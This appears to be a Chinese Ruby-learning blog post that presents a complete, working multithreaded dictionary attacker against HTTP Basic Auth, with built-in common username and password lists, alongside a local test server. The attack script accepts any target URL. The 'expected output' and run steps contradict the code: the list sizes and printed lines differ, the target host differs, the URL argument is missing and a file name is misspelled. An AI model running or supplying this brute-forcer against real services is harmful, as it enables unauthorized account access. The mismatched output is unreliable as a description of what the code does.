【30天學習新語言-Ruby】Day 7：寫一個簡易字典攻擊器測試弱密碼

727 字

4 分鐘

【30天學習新語言-Ruby】Day 7：寫一個簡易字典攻擊器測試弱密碼

2025-08-16

Learning

/

Ruby

/

30天學Ruby挑戰

💡 為什麼要字典攻擊？#

其實，即使到了 2025 年，還是有一堆網站用 admin/admin、test/test 這種弱密碼。

字典攻擊（Dictionary Attack）就是用常見密碼清單，一個一個去試，看能不能登入。這是滲透測試中最基本但也最有效的技巧之一。

今天會實作一個針對 HTTP Basic Auth 的字典攻擊器，順便學習怎麼從檔案讀取密碼清單。

🎯 大綱#

建立測試環境
從檔案讀取使用者名稱和密碼清單
實作 HTTP Basic Authentication
多執行緒加速測試
加入進度顯示和成功登入偵測

📚 知識點#

File.readlines() — 讀取檔案每一行到陣列
Base64.encode64() — Basic Auth 需要 Base64 編碼
Net::HTTP.start() — 保持連線的 HTTP 請求
Thread.new — 多執行緒處理
Queue.new — 執行緒安全的佇列

💻 實作#

dictionary_attack.rb：

1
#!/usr/bin/env ruby
2
require 'net/http'
3
require 'base64'
4
require 'thread'
5

6
class DictionaryAttacker
7
  def initialize(target_url, threads = 10)
8
    @target_url = target_url
9
    @uri = URI.parse(target_url)
10
    @threads = threads
11
    @mutex = Mutex.new
12
    @queue = Queue.new
13
    @tested = 0
14
    @start_time = Time.now
15
    @found_credentials = []
16
  end
17

18
  def default_passwords
19
    %w[
20
      admin password 123456 password123 admin123
21
      test demo root toor letmein
22
      welcome 123456789 qwerty abc123
23
    ]
24
  end
25

26
  def default_usernames
27
    %w[
28
      admin administrator root test
29
      user demo guest oracle mysql
30
    ]
31
  end
32

33
  def test_credential(username, password)
34
    begin
35
      http = Net::HTTP.new(@uri.host, @uri.port)
36
      http.use_ssl = (@uri.scheme == 'https')
37
      http.open_timeout = 5
38
      http.read_timeout = 5
39

40
      request = Net::HTTP::Get.new('/')
41
      credentials = Base64.strict_encode64("#{username}:#{password}")
42
      request['Authorization'] = "Basic #{credentials}"
43

44
      response = http.request(request)
45

46
      # 200 = 成功, 403 = 認證成功但無權限（也算成功）
47
      return ['200', '403'].include?(response.code)
48

49
    rescue => e
50
      return false
51
    end
52
  end
53

54
  def attack
55
    usernames = default_usernames
56
    passwords = default_passwords
57

58
    puts "Starting dictionary attack on: #{@target_url}"
59
    puts "Usernames: #{usernames.size}, Passwords: #{passwords.size}"
60
    puts "Total combinations: #{usernames.size * passwords.size}"
61
    puts "-" * 50
62

63
    # 產生所有組合
64
    usernames.each do |username|
65
      passwords.each do |password|
66
        @queue << [username, password]
67
      end
68
    end
69

70
    total = @queue.size
71

72
    # 建立工作執行緒
73
    workers = []
74
    @threads.times do
75
      workers << Thread.new do
76
        loop do
77
          begin
78
            username, password = @queue.pop(true)
79
          rescue ThreadError
80
            break
81
          end
82

83
          @mutex.synchronize do
84
            @tested += 1
85
            print "\rProgress: #{@tested}/#{total} - Testing: #{username}:#{password}    "
86
          end
87

88
          if test_credential(username, password)
89
            @mutex.synchronize do
90
              @found_credentials << {username: username, password: password}
91
              puts "\nFOUND: #{username}:#{password}"
92
            end
93
          end
94
        end
95
      end
96
    end
97

98
    workers.each(&:join)
99

100
    puts "\n" + "=" * 50
101
    if @found_credentials.empty?
102
      puts "No valid credentials found."
103
    else
104
      puts "Found #{@found_credentials.size} valid credential(s):"
105
      @found_credentials.each do |cred|
106
        puts "    #{cred[:username]}:#{cred[:password]}"
107
      end
108
    end
109
    puts "Time: #{(Time.now - @start_time).round(2)}s"
110
  end
111
end
112

113
if ARGV.empty?
114
  puts "Usage: ruby #{$0} <target_url>"
115
  exit
116
end
117

118
attacker = DictionaryAttacker.new(ARGV[0])
119
attacker.attack

test_server.rb：

1
#!/usr/bin/env ruby
2
require 'webrick'
3
require 'base64'
4

5
# 設定有效的帳號密碼
6
VALID_USERS = {
7
  'admin' => 'password123',
8
  'test' => 'test'
9
}
10

11
server = WEBrick::HTTPServer.new(:Port => 8000)
12

13
server.mount_proc '/' do |req, res|
14
  auth_header = req['Authorization']
15

16
  if auth_header && auth_header.start_with?('Basic ')
17
    credentials = Base64.decode64(auth_header[6..-1])
18
    username, password = credentials.split(':', 2)
19

20
    if VALID_USERS[username] == password
21
      # 密碼正確 - 回傳 200
22
      res.status = 200
23
      res.body = "Welcome #{username}! Authentication successful.\n"
24
      puts "Auth SUCCESS: #{username}"
25
    else
26
      # 密碼錯誤 - 回傳 401
27
      res.status = 401
28
      res['WWW-Authenticate'] = 'Basic realm="Test"'
29
      res.body = "Invalid credentials\n"
30
      puts "Auth FAILED: #{username}:#{password}"
31
    end
32
  else
33
    # 沒有認證資訊 - 回傳 401
34
    res.status = 401
35
    res['WWW-Authenticate'] = 'Basic realm="Test"'
36
    res.body = "Authentication required\n"
37
  end
38
end
39

40
puts "Server started on http://localhost:8000"
41
puts "Valid credentials:"
42
VALID_USERS.each { |u,p| puts "    #{u}:#{p}" }
43
puts "Ctrl+C to stop"
44

45
trap('INT') { server.shutdown }
46
server.start

🚀 執行方式#

建立檔案 dictionary_attack.rb
建立檔案
執行檔案 dictionary_attack.rb、test_sesrver.rb：

1
rb test_server.rb
2
rb dictionary_attack.rb （用另外一個 terminal）

預期輸出：

1
Starting dictionary attack on: http://192.168.1.1/admin
2
Usernames: 20, Passwords: 30
3
Total combinations: 600
4
Threads: 10
5
--------------------------------------------------
6
Progress: 230/600 (38.33%) - Testing: root:monkey
7

8
SUCCESS! Found valid credential:
9
    Username: admin
10
    Password: password123
11
    Time elapsed: 12.34 seconds
12
    Attempts: 247